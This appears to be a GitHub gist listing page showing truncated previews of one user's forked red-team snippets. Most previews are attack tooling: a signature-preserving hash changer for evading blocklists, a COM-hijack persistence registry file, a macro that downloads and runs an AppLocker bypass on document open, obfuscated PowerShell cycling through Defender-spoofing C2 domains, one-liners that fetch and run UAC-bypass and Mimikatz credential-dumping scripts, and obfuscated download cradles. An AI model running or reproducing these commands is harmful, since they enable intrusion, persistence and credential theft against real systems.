@s1im3r00
s1im3r00 / Copy-AuthenticodeSignedFile.ps1
Created April 13, 2021 04:26 — forked from mattifestation/Copy-AuthenticodeSignedFile.ps1
When supplied with an Authenticode-signed PowerShell script, Copy-AuthenticodeSignedFile generates the same signed, validated file but with a different file hash.
function Copy-AuthenticodeSignedFile {
<#
.SYNOPSIS
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.
.DESCRIPTION
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.
s1im3r00 / winlogon.reg
Created April 13, 2021 04:23 — forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
s1im3r00 / New-WPFMessageBox
Created April 5, 2021 18:02 — forked from SMSAgentSoftware/New-WPFMessageBox
PowerShell function to display a customizable WPF message box / window
Function New-WPFMessageBox {
# For usage examples, see my blog:
# https://smsagent.wordpress.com/2017/08/24/a-customisable-wpf-messagebox-for-powershell/
# CHANGES
# 2017-09-11 - Added some required assemblies in the dynamic parameters to avoid errors when run from the PS console host.
# Define Parameters
[CmdletBinding()]
s1im3r00 / tinype.asm
Created April 4, 2021 14:14 — forked from insolor/tinype.asm
Tiny PE
format binary as 'exe'
IMAGE_DOS_SIGNATURE equ 5A4Dh
IMAGE_NT_SIGNATURE equ 00004550h
PROCESSOR_AMD_X8664 equ 8664h
IMAGE_SCN_CNT_CODE equ 00000020h
IMAGE_SCN_MEM_READ equ 40000000h
IMAGE_SCN_MEM_WRITE equ 80000000h
IMAGE_SCN_CNT_INITIALIZED_DATA equ 00000040h
IMAGE_SUBSYSTEM_WINDOWS_GUI equ 2
IMAGE_NT_OPTIONAL_HDR64_MAGIC equ 20Bh
s1im3r00 / estn.ps1
Created April 3, 2021 07:16 — forked from mpgn/estn.ps1
function test
{
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[ValidateNotNullOrEmpty()]
[Byte[]]
$PEBytes,
s1im3r00 / macro_download_and_execute_msbuild_csproj_powershell.vba
Created April 2, 2021 10:46 — forked from RedTeams/macro_download_and_execute_msbuild_csproj_powershell.vba
macro - download and execute applocker bypass (msbuild / csproj / powershell)
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' powashell.csproj by @SubTee
' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0
Sub Document_Open()
Dim WinHttpReq As Object
Dim oStream As Object
Dim myURL As String
$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215'))
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub')
foreach($t in $se)
{
$pin=teSt-`Co`NNec`TIoN $t
if ($pin -ne $null)
{
$nic=$t
break
}
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
s1im3r00 / Download-Cradles-Oneliners.md
Created March 10, 2021 20:37 — forked from a7t0fwa7/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String combined with -bxor, handy for deobfuscating dynamically built strings:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
s1im3r00 / go-sharp-loader.go
Created March 10, 2021 20:32 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder